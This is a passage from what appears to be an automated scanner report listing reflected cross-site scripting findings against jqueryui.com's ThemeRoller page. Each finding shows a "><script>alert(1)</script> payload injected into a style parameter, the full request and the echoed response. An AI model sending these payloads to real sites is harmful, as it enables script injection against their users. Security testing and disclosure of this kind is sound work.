_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=99999913c1f"><script>alert(1)</script>bc465936fd5&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=f
...[SNIP]...

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 707ae"><script>alert(1)</script>2116519edf5 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px707ae"><script>alert(1)</script>2116519edf5&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b25"><script>alert(1)</script>6776f4259fb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px67b25"><script>alert(1)</script>6776f4259fb" type="text/css" media="all" />
...[SNIP]...

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a818"><script>alert(1)</script>bc6a78482e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=0000001a818"><script>alert(1)</script>bc6a78482e&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 276ad"><script>alert(1)</script>5df8c0fde9e was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff276ad"><script>alert(1)</script>5df8c0fde9e&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTex
...[SNIP]...

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68fa"><script>alert(1)</script>a39040d10a4 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000a68fa"><script>alert(1)</script>a39040d10a4&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=
...[SNIP]...

2.64. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b805c"><script>alert(1)</script>db7f5730f61 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ab805c"><script>alert(1)</script>db7f5730f61&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8cda"><script>alert(1)</script>529d59993df was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f8cda"><script>alert(1)</script>529d59993df&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefau
...[SNIP]...

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ca7"><script>alert(1)</script>19d3cb864a7 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636b0ca7"><script>alert(1)</script>19d3cb864a7&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=
...[SNIP]...

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec9bd"><script>alert(1)</script>b1d6a495bd5 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000ec9bd"><script>alert(1)</script>b1d6a495bd5&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTexture
...[SNIP]...

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e01a9"><script>alert(1)</script>9aceb87732b was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

